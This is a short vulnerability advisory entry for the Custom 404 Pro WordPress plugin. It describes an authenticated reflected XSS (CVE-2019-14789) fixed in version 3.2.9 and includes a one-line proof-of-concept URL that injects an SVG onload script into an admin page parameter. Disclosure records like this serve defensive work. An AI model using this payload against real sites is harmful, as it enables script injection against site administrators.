Custom 404 Pro < 3.2.9 - Authenticated Reflected XSS



Proof of Concept
Version <= 3.2.7: /wp-admin/admin.php?page=c4p-main&s="><svg/onload=alert(/XSS/)>

Affects Plugin

Custom 404 Pro: fixed in version 3.2.9

References

CVE 2019-14789
URL https://plugins.trac.wordpress.org/changeset?reponame=&new=2112485%40custom-404-pro&old=2087395%40custom-404-pro

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Views 2434
Verified No
WPVDB ID 9382

Timeline

Publicly Published 2019-06-24
Added 2019-06-24
Last Updated 2019-08-30
